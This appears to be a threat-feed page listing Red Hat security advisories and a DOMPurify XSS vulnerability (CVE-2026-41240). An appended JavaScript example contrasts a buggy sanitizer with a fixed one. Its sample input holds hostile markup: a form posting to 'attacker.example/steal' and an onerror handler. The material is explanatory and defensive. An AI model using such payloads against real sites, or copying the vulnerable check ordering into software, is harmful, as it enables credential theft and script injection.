
Threats Tagged 'cve-2026-41240'

View all threats tagged with 'cve-2026-41240'. Filter and sort to focus on specific types of threats.


Red Hat Security Advisory: Red Hat Developer Hub 1.8.7 release (CVE-2026-6321)

Red Hat Discovery, also known as Discovery, is an inspection and reporting tool that finds, identifies, and reports environment data, or facts, such as the number of physical and virtual systems on a network, their operating systems, and relevant configuration data stored within them. Discovery also identifies and reports more detailed facts for some versions of key Red Hat packages and products that it finds in the network.
Red Hat Security Advisory: Kiali 1.73.30 for Red Hat OpenShift Service Mesh 2.6 (CVE-2026-32280)

Kiali 1.73.30, for Red Hat OpenShift Service Mesh 2.6, provides observability for the service mesh by offering a visual representation of the mesh topology and metrics, helping users monitor, trace, and manage efficiently.

Security Fix(es):
* CVE-2026-32280 Go: Denial of Service vulnerability in certificate chain building (OSSM-13521)
* CVE-2026-40895 follow-redirects: Information disclosure via cross-domain redirects (OSSM-13550, OSSM-13551)
* CVE-2026-41240 DOMPurify: Cross-Site Scripting (XSS) via inconsistent tag sanitization (OSSM-13592)
* CVE-2026-42033 Axios: HTTP Transport Hijacking via Prototype Pollution (OSSM-13687, OSSM-13688)
* CVE-2026-42035 Axios: Arbitrary HTTP header injection via prototype pollution (OSSM-13594, OSSM-13595)
* CVE-2026-42039 Axios: Denial of Service via unbounded recursion in toFormData with deeply nested request data (OSSM-13725, OSSM-13726)
* CVE-2026-42041 Axios: Authentication bypass due to prototype pollution of HTTP error handling (OSSM-13739, OSSM-13740)
* CVE-2026-42043 Axios: NO_PROXY bypass via crafted URL (OSSM-13711, OSSM-13712)

Enhancement(s):
* OSSM-12301 Migration from Yarn Classic (v1) to Yarn v4 or NPM

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Red Hat Security Advisory: pcs security update (CVE-2026-4800)

The pcs packages provide a command-line configuration system for the Pacemaker and Corosync utilities.

Security Fix(es):
* tornado-python: Tornado: Denial of Service via large multipart bodies (CVE-2026-31958)
* lodash: lodash: Arbitrary code execution via untrusted input in template imports (CVE-2026-4800)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.16.26 security, enhancement & bug fix update (CVE-2026-4800)

Red Hat OpenShift Data Foundation 4.16.26 security, enhancement & bug fix update.

FIXED BUGS:
* DFBUGS-6193: Backport to odf-4.16.26: ocs-operator should not use image gcr.io/kubebuilder/kube-rbac-proxy
* DFBUGS-5940: Backport to odf-4.16.z: [External Mode] noobaa-default-backing-store is in creating state due to "CheckExternalConnection Status=UNKNOWN_FAILURE Error=SELF_SIGNED_CERT_IN_CHAIN"
Red Hat Security Advisory: General availability of the satellite/iop-remediations-rhel9 container image (CVE-2026-4800)

Red Hat Lightspeed in Satellite analyzes system health and configuration by applying predefined rules to a small set of local data, such as installed packages, running services, and configuration settings. When you install Red Hat Lightspeed in Satellite locally, you can generate Red Hat Lightspeed recommendations without sending system data to Red Hat services.
Red Hat Security Advisory: Red Hat build of Quarkus 3.27.3.SP1 security update (CVE-2025-14813)

This release of Red Hat build of Quarkus 3.27.3.SP1 includes the following CVE fixes:
* quarkus-vertx-http: io.quarkus:quarkus-vertx-http: Authorization bypass via semicolons in HTTP requests [quarkus-3.27] (CVE-2026-39852)
* bcprov-jdk18on: LDAP injection vulnerability in LDAPStoreHelper.java [quarkus-3.27] (CVE-2026-0636)
* bcpkix-jdk18on: PKIX draft CompositeVerifier accepts empty signature sequence as valid [quarkus-3.27] (CVE-2026-5588)
* bcprov-jdk18on: GOSTCTR implementation unable to process more than 255 blocks correctly [quarkus-3.27] (CVE-2025-14813)
* kafka-clients: Apache Kafka Clients: Information disclosure and data corruption due to race condition in producer buffer management [quarkus-3.27] (CVE-2026-35554)

For more information, see the release notes page listed in the References section.
CVE-2026-41240: CWE-183: Permissive List of Allowed Inputs in cure53 DOMPurify

DOMPurify is a DOM-only cross-site scripting sanitizer for HTML, MathML, and SVG. Versions prior to 3.4.0 have an inconsistency between FORBID_TAGS and FORBID_ATTR handling when a function-based ADD_TAGS is used. Commit c361baa added an early exit for FORBID_ATTR at line 1214; the same fix was not applied to FORBID_TAGS. At lines 1118-1123, when EXTRA_ELEMENT_HANDLING.tagCheck returns true, short-circuit evaluation skips the FORBID_TAGS check entirely, so a deny-listed element is kept whenever the caller's ADD_TAGS predicate happens to accept its name. This allows forbidden elements to survive sanitization with their attributes intact. Version 3.4.0 patches the issue; until then, any configuration that relies on FORBID_TAGS to override a function-based ADD_TAGS should be treated as not enforcing that deny-list.
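The ordering flaw described above, as an added example that is not DOMPurify's code: a toy sanitizer in which a caller-supplied allow predicate is evaluated before the deny-list (the pre-3.4.0 pattern), beside the fixed form that exits early on the deny-list the way the advisory says commit c361baa already did for FORBID_ATTR. The option names mirror DOMPurify's; the tokenizer, the permissive predicate, the sample input and the version helper are constructed assumptions for illustration.

```javascript
// Toy model of the allow/deny ordering bug in CVE-2026-41240.
// NOT DOMPurify code: option names are borrowed, everything else is assumed.

const ALLOWED_TAGS = new Set(['p', 'b', 'i', 'a', 'img']);
const ALLOWED_ATTR = new Set(['href', 'src', 'alt', 'action', 'name']);
const FORBID_TAGS = new Set(['form', 'style']);      // deny-list: must always win
const FORBID_ATTR = new Set(['onerror', 'onload']);  // deny-list: must always win

// Hypothetical function-based ADD_TAGS: "admit any well-formed element name",
// the kind of permissive predicate used to allow custom elements. It also
// returns true for "form" and "style", which is exactly the danger.
const tagCheck = (tag) => /^[a-z][a-z0-9-]*$/.test(tag);

// Pre-3.4.0 pattern: the predicate runs first and a true result
// short-circuits the whole expression, so FORBID_TAGS is never consulted.
function keepElementBuggy(tag) {
  return tagCheck(tag) || (ALLOWED_TAGS.has(tag) && !FORBID_TAGS.has(tag));
}

// Fixed pattern: early exit on the deny-list, then the allow rules.
function keepElementFixed(tag) {
  if (FORBID_TAGS.has(tag)) return false;
  return tagCheck(tag) || ALLOWED_TAGS.has(tag);
}

// Attribute side already had the early exit per the advisory; modelled once.
function keepAttribute(name) {
  if (FORBID_ATTR.has(name)) return false;
  return ALLOWED_ATTR.has(name);
}

// Minimal tokenizer for the constructed input only: start tags with
// double-quoted attributes, end tags, and text. Not a real HTML parser.
const TOKEN = /<\/([a-z][a-z0-9-]*)>|<([a-z][a-z0-9-]*)((?:\s+[a-z-]+="[^"]*")*)\s*>|([^<]+)/gi;
const ATTR = /([a-z-]+)="([^"]*)"/gi;

function sanitize(html, keepElement) {
  let out = '';
  for (const m of html.matchAll(TOKEN)) {
    const [, endTag, startTag, rawAttrs, text] = m;
    if (text !== undefined) { out += text; continue; }
    const tag = (endTag ?? startTag).toLowerCase();
    if (!keepElement(tag)) continue;           // element dropped, children kept
    if (endTag) { out += `</${tag}>`; continue; }
    const attrs = [];
    for (const a of rawAttrs.matchAll(ATTR)) {
      const name = a[1].toLowerCase();
      if (keepAttribute(name)) attrs.push(` ${name}="${a[2]}"`);
    }
    out += `<${tag}${attrs.join('')}>`;
  }
  return out;
}

// Constructed sample: a form posting to an attacker host plus a style block,
// both on the deny-list, alongside ordinary allowed markup.
const SAMPLE =
  '<p>hi</p><form action="https://attacker.example/steal" onload="x()">' +
  '<b>login</b></form><style>p{display:none}</style><img src="a.png" onerror="evil()">';

function sanitizeBuggy(html = SAMPLE) { return sanitize(html, keepElementBuggy); }
function sanitizeFixed(html = SAMPLE) { return sanitize(html, keepElementFixed); }

// Version gate from the advisory: DOMPurify releases before 3.4.0 are affected.
function isVulnerableDomPurify(version) {
  const [major = 0, minor = 0] = version.split('.').map(Number);
  if (major !== 3) return major < 3;
  return minor < 4;
}

console.log('buggy:', sanitizeBuggy());
console.log('fixed:', sanitizeFixed());
```

With the buggy ordering the form survives with its action attribute intact (only the forbidden onload attribute is stripped), which is the "forbidden elements survive with their attributes" outcome the advisory describes; with the early exit the form and style elements are removed regardless of what the predicate returns. The practical rule is the same in any sanitizer: evaluate deny-lists before any caller-supplied allow callback.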
